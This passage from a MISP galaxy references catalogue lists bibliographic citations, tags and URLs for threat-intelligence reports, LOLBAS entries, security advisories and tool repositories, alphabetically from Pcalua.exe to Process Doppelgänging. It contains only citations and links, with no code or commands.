LOLBAS. (2018, May 25). Pcalua.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pcalua.exe - LOLBAS Project"

Table 14922. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pcalua/

pcodedmp Bontchev

Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="pcodedmp Bontchev"

Table 14923. Table References

Links

https://github.com/bontchev/pcodedmp

GitHub PcShare 2014

LiveMirror. (2014, September 17). PcShare. Retrieved October 11, 2022.

The tag is: misp-galaxy:references="GitHub PcShare 2014"

Table 14924. Table References

Links

https://github.com/LiveMirror/pcshare

Pcwrun.exe - LOLBAS Project

LOLBAS. (2018, May 25). Pcwrun.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pcwrun.exe - LOLBAS Project"

Table 14925. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/

Pcwutl.dll - LOLBAS Project

LOLBAS. (2018, May 25). Pcwutl.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pcwutl.dll - LOLBAS Project"

Table 14926. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/

Microsoft Peach Sandstorm September 14 2023

Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved January 31, 2024.

The tag is: misp-galaxy:references="Microsoft Peach Sandstorm September 14 2023"

Table 14927. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Microsoft Peach Sandstorm 2023

Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Microsoft Peach Sandstorm 2023"

Table 14928. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Microsoft PEB 2021

Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Microsoft PEB 2021"

Table 14929. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

Peirates GitHub

InGuardians. (2022, January 5). Peirates GitHub. Retrieved February 8, 2022.

The tag is: misp-galaxy:references="Peirates GitHub"

Table 14930. Table References

Links

https://github.com/inguardians/peirates

Pentesting AD Forests

García, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Pentesting AD Forests"

Table 14931. Table References

Links

https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019

U.S. CISA BlackTech September 27 2023

Cybersecurity and Infrastructure Security Agency. (2023, September 27). People’s Republic of China-Linked Cyber Actors Hide in Router Firmware. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="U.S. CISA BlackTech September 27 2023"

Table 14932. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a

U.S. CISA Volt Typhoon May 24 2023

Cybersecurity and Infrastructure Security Agency. (2023, May 24). People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved May 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Volt Typhoon May 24 2023"

Table 14933. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

Joint Cybersecurity Advisory Volt Typhoon June 2023

NSA et al. (2023, May 24). People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="Joint Cybersecurity Advisory Volt Typhoon June 2023"

Table 14934. Table References

Links

https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

TechNet Firewall Design

Microsoft. (2004, February 6). Perimeter Firewall Design. Retrieved April 25, 2016.

The tag is: misp-galaxy:references="TechNet Firewall Design"

Table 14935. Table References

Links

https://technet.microsoft.com/en-us/library/cc700828.aspx

Oddvar Moe IFEO APR 2018

Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.

The tag is: misp-galaxy:references="Oddvar Moe IFEO APR 2018"

Table 14936. Table References

Links

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

Oddvar Moe RunOnceEx Mar 2018

Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.

The tag is: misp-galaxy:references="Oddvar Moe RunOnceEx Mar 2018"

Table 14937. Table References

Links

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

Xorrior Authorization Plugins

Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Xorrior Authorization Plugins"

Table 14938. Table References

Links

https://xorrior.com/persistent-credential-theft/

SpecterOps JXA 2020

Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="SpecterOps JXA 2020"

Table 14939. Table References

Links

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

PersistentJXA_leopitt

Leo Pitt. (2020, August 6). Persistent JXA - A poor man’s Powershell for macOS. Retrieved January 11, 2021.

The tag is: misp-galaxy:references="PersistentJXA_leopitt"

Table 14940. Table References

Links

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

Pester.bat - LOLBAS Project

LOLBAS. (2018, May 25). Pester.bat. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pester.bat - LOLBAS Project"

Table 14941. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/pester/

TrendMicro PE_URSNIF.A2

Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro PE_URSNIF.A2"

Table 14942. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_URSNIF.A2?_ga=2.131425807.1462021705.1559742358-1202584019.1549394279

Volatility Phalanx2

Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Volatility Phalanx2"

Table 14943. Table References

Links

https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html

Prevailion EvilNum May 2020

Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021.

The tag is: misp-galaxy:references="Prevailion EvilNum May 2020"

Table 14944. Table References

Links

https://www.prevailion.com/phantom-in-the-command-shell-2/

ryhanson phishery SEPT 2016

Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.

The tag is: misp-galaxy:references="ryhanson phishery SEPT 2016"

Table 14945. Table References

Links

https://github.com/ryhanson/phishery

GitHub Phishery

Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.

The tag is: misp-galaxy:references="GitHub Phishery"

Table 14946. Table References

Links

https://github.com/ryhanson/phishery

ANSSI Nobelium Phishing December 2021

ANSSI. (2021, December 6). PHISHING CAMPAIGNS BY THE NOBELIUM INTRUSION SET. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="ANSSI Nobelium Phishing December 2021"

Table 14947. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf

Enigma Phishing for Credentials Jan 2015

Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="Enigma Phishing for Credentials Jan 2015"

Table 14948. Table References

Links

https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

KISA Operation Muzabi

KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="KISA Operation Muzabi"

Table 14949. Table References

Links

https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=35936

Staaldraad Phishing with OAuth 2017

Stalmans, E. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Staaldraad Phishing with OAuth 2017"

Table 14950. Table References

Links

https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

phobos_virustotal

Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="phobos_virustotal"

Table 14951. Table References

Links

https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection

Talos Remcos Aug 2018

Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Talos Remcos Aug 2018"

Table 14952. Table References

Links

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

FireEye FIN6 Apr 2019

McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="FireEye FIN6 Apr 2019"

Table 14953. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Picus Labs Proc cump 2022

Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.

The tag is: misp-galaxy:references="Picus Labs Proc cump 2022"

Table 14954. Table References

Links

https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use

wired-pig butchering

Lily Hay Newman. (n.d.). ‘Pig Butchering’ Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="wired-pig butchering"

Table 14955. Table References

Links

https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/

Malwarebytes Pikabot December 15 2023

Jérôme Segura. (2023, December 15). PikaBot distributed via malicious search ads. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Malwarebytes Pikabot December 15 2023"

Table 14956. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads

Trustwave Pillowmint June 2020

Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief. Retrieved July 27, 2020.

The tag is: misp-galaxy:references="Trustwave Pillowmint June 2020"

Table 14957. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

TechNet Ping

Microsoft. (n.d.). Ping. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="TechNet Ping"

Table 14958. Table References

Links

https://technet.microsoft.com/en-us/library/bb490968.aspx

Pass The Cookie

Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.

The tag is: misp-galaxy:references="Pass The Cookie"

Table 14959. Table References

Links

https://wunderwuzzi23.github.io/blog/passthecookie.html

Pktmon.exe - LOLBAS Project

LOLBAS. (2020, August 12). Pktmon.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pktmon.exe - LOLBAS Project"

Table 14960. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pktmon/

Osanda Stealing NetNTLM Hashes

Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.

The tag is: misp-galaxy:references="Osanda Stealing NetNTLM Hashes"

Table 14961. Table References

Links

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

Microsoft PLATINUM June 2017

Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="Microsoft PLATINUM June 2017"

Table 14962. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc

Microsoft PLATINUM April 2016

Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Microsoft PLATINUM April 2016"

Table 14963. Table References

Links

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

Forcepoint Felismus Mar 2017

Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Forcepoint Felismus Mar 2017"

Table 14964. Table References

Links

https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware

Symantec Play Ransomware April 19 2023

Symantec Threat Hunter Team. (2023, April 19). Play Ransomware Group Using New Custom Data-Gathering Tools. Retrieved August 10, 2023.

The tag is: misp-galaxy:references="Symantec Play Ransomware April 19 2023"

Table 14965. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

Trend Micro Play Playbook September 06 2022

Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares. (2022, September 6). Play Ransomware’s Attack Playbook Similar to that of Hive, Nokoyawa. Retrieved August 10, 2023.

The tag is: misp-galaxy:references="Trend Micro Play Playbook September 06 2022"

Table 14966. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

Trend Micro Play Ransomware September 06 2022

Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares. (2022, September 6). Play Ransomware’s Attack Playbook Similar to that of Hive, Nokoyawa. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Trend Micro Play Ransomware September 06 2022"

Table 14967. Table References

Links

https://www.trendmicro.com/es_es/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

JPCert PLEAD Downloader June 2018

Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="JPCert PLEAD Downloader June 2018"

Table 14968. Table References

Links

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

Trend Micro PLEAD RTLO

Alintanahin, K. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Trend Micro PLEAD RTLO"

Table 14969. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

fileinfo plist file description

FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="fileinfo plist file description"

Table 14970. Table References

Links

https://fileinfo.com/extension/plist

Pnputil.exe - LOLBAS Project

LOLBAS. (2020, December 25). Pnputil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pnputil.exe - LOLBAS Project"

Table 14971. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pnputil/

uptycs Fake POC linux malware 2023

Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="uptycs Fake POC linux malware 2023"

Table 14972. Table References

Links

https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware

GitHub SIP POC Sept 2017

Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="GitHub SIP POC Sept 2017"

Table 14973. Table References

Links

https://github.com/mattifestation/PoCSubjectInterfacePackage

Kube Pod

Kubernetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Pod"

Table 14974. Table References

Links

https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core

Talos PoetRAT October 2020

Mercer, W., Rascagneres, P., Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves. Retrieved April 9, 2021.

The tag is: misp-galaxy:references="Talos PoetRAT October 2020"

Table 14975. Table References

Links

https://blog.talosintelligence.com/2020/10/poetrat-update.html

Talos PoetRAT April 2020

Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.

The tag is: misp-galaxy:references="Talos PoetRAT April 2020"

Table 14976. Table References

Links

https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html

Talos Zeus Panda Nov 2017

Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Talos Zeus Panda Nov 2017"

Table 14977. Table References

Links

https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More

FireEye Poison Ivy

FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="FireEye Poison Ivy"

Table 14978. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

Umbreon Trend Micro

Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.

The tag is: misp-galaxy:references="Umbreon Trend Micro"

Table 14979. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046

AWS IAM Policies and Permissions

AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AWS IAM Policies and Permissions"

Table 14980. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html

EnableMPRNotifications

Microsoft. (2023, January 26). Policy CSP - WindowsLogon. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="EnableMPRNotifications"

Table 14981. Table References

Links

https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowslogon

Microsoft DirSync

Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Microsoft DirSync"

Table 14982. Table References

Links

https://msdn.microsoft.com/en-us/library/ms677626.aspx

Polyglot Files: a Hacker’s best friend

Li, V. (2019, October 2). Polyglot Files: a Hacker’s best friend. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Polyglot Files: a Hacker’s best friend"

Table 14983. Table References

Links

https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

CheckPoint Redaman October 2019

Eisenkraft, K., Olshtein, A. (2019, October 17). Pony’s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="CheckPoint Redaman October 2019"

Table 14984. Table References

Links

https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/

Kaspersky Poseidon Group

Kaspersky Lab’s Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.

The tag is: misp-galaxy:references="Kaspersky Poseidon Group"

Table 14985. Table References

Links

https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

Breach Post-mortem SSH Hijack

Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.

The tag is: misp-galaxy:references="Breach Post-mortem SSH Hijack"

Table 14986. Table References

Links

https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

Elastic Docs Potential Protocol Tunneling via EarthWorm

Elastic. (n.d.). Potential Protocol Tunneling via EarthWorm. Retrieved July 7, 2023.

The tag is: misp-galaxy:references="Elastic Docs Potential Protocol Tunneling via EarthWorm"

Table 14987. Table References

Links

https://www.elastic.co/guide/en/security/current/potential-protocol-tunneling-via-earthworm.html

This is Security Command Line Confusion

Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.

The tag is: misp-galaxy:references="This is Security Command Line Confusion"

Table 14988. Table References

Links

https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

TrendMicro POWELIKS AUG 2014

Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="TrendMicro POWELIKS AUG 2014"

Table 14989. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

Microsoft: Powercfg command-line options

Microsoft. (2021, December 15). Powercfg command-line options. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="Microsoft: Powercfg command-line options"

Table 14990. Table References

Links

https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict

Volexity PowerDuke November 2016

Adair, S. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="Volexity PowerDuke November 2016"

Table 14991. Table References

Links

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

Cybereason PowerLess February 2022

Cybereason Nocturnus. (2022, February 1). PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Cybereason PowerLess February 2022"

Table 14992. Table References

Links

https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage

MalwareTech Power Loader Aug 2013

MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="MalwareTech Power Loader Aug 2013"

Table 14993. Table References

Links

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

Powerpnt.exe - LOLBAS Project

LOLBAS. (2019, July 19). Powerpnt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Powerpnt.exe - LOLBAS Project"

Table 14994. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/

Sophos PowerShell Command History Forensics

Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.

The tag is: misp-galaxy:references="Sophos PowerShell Command History Forensics"

Table 14995. Table References

Links

https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

Microsoft PowerShell CLM

PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.

The tag is: misp-galaxy:references="Microsoft PowerShell CLM"

Table 14996. Table References

Links

https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

SensePost PS DDE May 2016

El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="SensePost PS DDE May 2016"

Table 14997. Table References

Links

https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/

Powersploit

PowerSploit. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Powersploit"

Table 14998. Table References

Links

https://github.com/mattifestation/PowerSploit

PowerSploit Documentation

PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.

The tag is: misp-galaxy:references="PowerSploit Documentation"

Table 14999. Table References

Links

http://powersploit.readthedocs.io

PowerShellMagazine PowerSploit July 2014

Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.

The tag is: misp-galaxy:references="PowerShellMagazine PowerSploit July 2014"

Table 15000. Table References

Links

http://www.powershellmagazine.com/2014/07/08/powersploit/

GitHub PowerSploit May 2012

PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.

The tag is: misp-galaxy:references="GitHub PowerSploit May 2012"

Table 15001. Table References

Links

https://github.com/PowerShellMafia/PowerSploit

byt3bl33d3r NTLM Relaying

Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.

The tag is: misp-galaxy:references="byt3bl33d3r NTLM Relaying"

Table 15002. Table References

Links

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

U.S. CISA Volt Typhoon February 7 2024

Cybersecurity and Infrastructure Security Agency. (2024, February 7). PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. Retrieved February 9, 2024.

The tag is: misp-galaxy:references="U.S. CISA Volt Typhoon February 7 2024"

Table 15003. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a

Zimbra Preauth

Zimbra. (2023, March 16). Preauth. Retrieved May 31, 2023.

The tag is: misp-galaxy:references="Zimbra Preauth"

Table 15004. Table References

Links

https://wiki.zimbra.com/wiki/Preauth

Microsoft Preauthentication Jul 2012

Microsoft. (2012, July 18). Preauthentication. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Microsoft Preauthentication Jul 2012"

Table 15005. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN

Elastic Predicting DGA

Ahuja, A., Anderson, H., Grant, D., Woodbridge, J. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.

The tag is: misp-galaxy:references="Elastic Predicting DGA"

Table 15006. Table References

Links

https://arxiv.org/pdf/1611.00791.pdf

WithSecure SystemBC May 10 2021

Callum Roxan, Sami Ruohonen. (2021, May 10). Prelude to Ransomware: SystemBC. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="WithSecure SystemBC May 10 2021"

Table 15007. Table References

Links

https://labs.withsecure.com/publications/prelude-to-ransomware-systembc

Presentationhost.exe - LOLBAS Project

LOLBAS. (2018, May 25). Presentationhost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Presentationhost.exe - LOLBAS Project"

Table 15008. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/

Microsoft Sub Takeover 2020

Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.

The tag is: misp-galaxy:references="Microsoft Sub Takeover 2020"

Table 15009. Table References

Links

https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover

Microsoft Preventing SMB

Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020.

The tag is: misp-galaxy:references="Microsoft Preventing SMB"

Table 15010. Table References

Links

https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections

Palo Alto Prince of Persia

Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Palo Alto Prince of Persia"

Table 15011. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

PrintBrm.exe - LOLBAS Project

LOLBAS. (2021, June 21). PrintBrm.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="PrintBrm.exe - LOLBAS Project"

Table 15012. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/

Print.exe - LOLBAS Project

LOLBAS. (2018, May 25). Print.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Print.exe - LOLBAS Project"

Table 15013. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Print/

Rhingo Security Labs GCP Privilege Escalation

Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Rhingo Security Labs GCP Privilege Escalation"

Table 15014. Table References

Links

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Rhino Google Cloud Privilege Escalation

Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Rhino Google Cloud Privilege Escalation"

Table 15015. Table References

Links

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

FireEye APT19

Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.

The tag is: misp-galaxy:references="FireEye APT19"

Table 15016. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html

Anomali Static Kitten February 2021

Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Anomali Static Kitten February 2021"

Table 15017. Table References

Links

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

Procdump.exe - LOLBAS Project

LOLBAS. (2020, October 14). Procdump.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Procdump.exe - LOLBAS Project"

Table 15018. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/

Microsoft Process Creation Flags May 2018

Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Microsoft Process Creation Flags May 2018"

Table 15019. Table References

Links

https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags

hasherezade Process Doppelgänging Dec 2017

